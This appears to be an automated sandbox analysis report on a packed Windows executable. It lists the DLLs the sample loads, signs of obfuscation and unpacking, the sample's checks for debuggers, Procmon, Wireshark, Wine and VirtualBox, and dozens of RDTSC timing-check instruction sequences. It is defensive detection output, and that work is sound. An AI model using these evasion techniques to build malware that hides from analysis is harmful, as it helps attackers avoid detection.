Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeSection loaded: kernel.appcore.dllJump to behavior
Source: wlEp68Few5.exeStatic file information: File size 4474880 > 1048576
Source: wlEp68Few5.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: wlEp68Few5.exeStatic PE information: Raw size of vwhakcfb is bigger than: 0x100000 < 0x1bcc00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\wlEp68Few5.exeUnpacked PE file: 0.2.wlEp68Few5.exe.470000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vwhakcfb:EW;nubvuqgg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vwhakcfb:EW;nubvuqgg:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: wlEp68Few5.exeStatic PE information: real checksum: 0x44f6fb should be: 0x454563
Source: wlEp68Few5.exeStatic PE information: section name:
Source: wlEp68Few5.exeStatic PE information: section name: .idata
Source: wlEp68Few5.exeStatic PE information: section name:
Source: wlEp68Few5.exeStatic PE information: section name: vwhakcfb
Source: wlEp68Few5.exeStatic PE information: section name: nubvuqgg
Source: wlEp68Few5.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_3_017EDCD1 push esi; ret 0_3_017EDCD2
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_3_017ECCCB push esp; iretd 0_3_017ECD2A
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_3_017F0038 push eax; ret 0_3_017F0039
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_3_017E9B8D push eax; retf 0_3_017E9B95
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_3_017ECA8B push esp; ret 0_3_017ECCCA
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007F41D0 push eax; mov dword ptr [esp], edx0_2_007F41D5
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004F2340 push eax; mov dword ptr [esp], 00000000h0_2_004F2343
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_0052C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0052C743
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004B0AC0 push eax; mov dword ptr [esp], 00000000h0_2_004B0AC4
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004D1430 push eax; mov dword ptr [esp], 00000000h0_2_004D1433
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004F39A0 push eax; mov dword ptr [esp], 00000000h0_2_004F39A3
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_004CDAD0 push eax; mov dword ptr [esp], edx0_2_004CDAD1
Source: C:\Users\user\Desktop\wlEp68Few5.exeCode function: 0_2_007F9F40 push dword ptr [eax+04h]; ret 0_2_007F9F6F
Source: wlEp68Few5.exeStatic PE information: section name: vwhakcfb entropy: 7.956697617870847

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\wlEp68Few5.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\wlEp68Few5.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\wlEp68Few5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0CA47 second address: C0CA52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0412D second address: C04133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C04133 second address: C0413C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0413C second address: C04142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C04142 second address: C04174 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jnp 00007F6F946E7E43h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6F946E7E43h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0BA45 second address: C0BA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0BA4D second address: C0BA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0BA53 second address: C0BA57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0BA57 second address: C0BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jg 00007F6F946E7E59h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6F946E7E47h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0C0DD second address: C0C0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6F951A9EB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0C0E8 second address: C0C105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E47h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0C278 second address: C0C282 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6F951A9EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C0C282 second address: C0C2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F946E7E49h 0x0000000d jmp 00007F6F946E7E47h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C100CA second address: C100CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C10161 second address: C101A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6F946E7E44h 0x0000000c jmp 00007F6F946E7E3Eh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov esi, dword ptr [ebp+122D37E9h] 0x0000001b push 00000000h 0x0000001d add dword ptr [ebp+122D1AE7h], edx 0x00000023 call 00007F6F946E7E39h 0x00000028 js 00007F6F946E7E40h 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C101A1 second address: C101C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 je 00007F6F951A9EBCh 0x0000000d jne 00007F6F951A9EB6h 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007F6F951A9EB6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C101C7 second address: C101DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C101DA second address: C102AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jg 00007F6F951A9ED2h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jne 00007F6F951A9EC0h 0x0000001c pop eax 0x0000001d mov dword ptr [ebp+122D18CAh], eax 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F6F951A9EB8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f xor edx, dword ptr [ebp+122D23AEh] 0x00000045 mov dword ptr [ebp+122D1AE7h], esi 0x0000004b push 00000000h 0x0000004d movsx esi, di 0x00000050 push 00000003h 0x00000052 jmp 00007F6F951A9EC4h 0x00000057 push A11675BEh 0x0000005c jmp 00007F6F951A9EC1h 0x00000061 add dword ptr [esp], 1EE98A42h 0x00000068 jmp 00007F6F951A9EBFh 0x0000006d lea ebx, dword ptr [ebp+12455E76h] 0x00000073 mov dword ptr [ebp+122D23BAh], eax 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e js 00007F6F951A9EB6h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C102AD second address: C102B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C103DF second address: C103E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C21E45 second address: C21E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2EE6D second address: C2EE7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F6F951A9EB6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2EE7A second address: C2EE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6F946E7E36h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F6F946E7E3Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F003 second address: C2F02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC9h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jo 00007F6F951A9EBCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F02B second address: C2F056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F6F946E7E73h 0x0000000b jmp 00007F6F946E7E3Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6F946E7E44h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F1EA second address: C2F1EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F1EE second address: C2F1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F6CF second address: C2F6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F82E second address: C2F84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F6F946E7E40h 0x0000000b jns 00007F6F946E7E36h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F84B second address: C2F860 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F951A9EBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F860 second address: C2F866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F866 second address: C2F880 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6F951A9EB6h 0x00000008 jmp 00007F6F951A9EBCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2F880 second address: C2F884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2FDB3 second address: C2FDD0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6F951A9EC8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2701F second address: C27023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27023 second address: C27033 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6F951A9EB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27033 second address: C27039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27039 second address: C27053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F6F951A9EB6h 0x0000000f jmp 00007F6F951A9EBBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF19AA second address: BF19CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E44h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jnc 00007F6F946E7E36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF19CE second address: BF19DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF19DA second address: BF19F0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6F946E7E3Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF19F0 second address: BF1A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007F6F951A9EB6h 0x00000015 jmp 00007F6F951A9EC8h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF1A1E second address: BF1A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF1A23 second address: BF1A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C2FF07 second address: C2FF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C306AD second address: C306B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C352C1 second address: C352C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C352C5 second address: C352D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C352D1 second address: C352EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E47h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C352EC second address: C352F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C352F2 second address: C35319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6F946E7E3Dh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F6F946E7E40h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C35319 second address: C35326 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F951A9EB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C658 second address: C3C65E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C65E second address: C3C67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6F951A9EC2h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C67B second address: C3C681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C681 second address: C3C690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C690 second address: C3C6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F6F946E7E47h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C6AE second address: C3C6B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3BB58 second address: C3BB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F6F946E7E3Bh 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3BB6A second address: C3BB87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC3h 0x00000007 je 00007F6F951A9EC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C32B second address: C3C330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C471 second address: C3C4BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6F951A9EB6h 0x00000008 jc 00007F6F951A9EB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jp 00007F6F951A9EBAh 0x00000017 push edi 0x00000018 pop edi 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F6F951A9EC2h 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007F6F951A9EB6h 0x00000028 jmp 00007F6F951A9EC8h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C4BE second address: C3C4C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
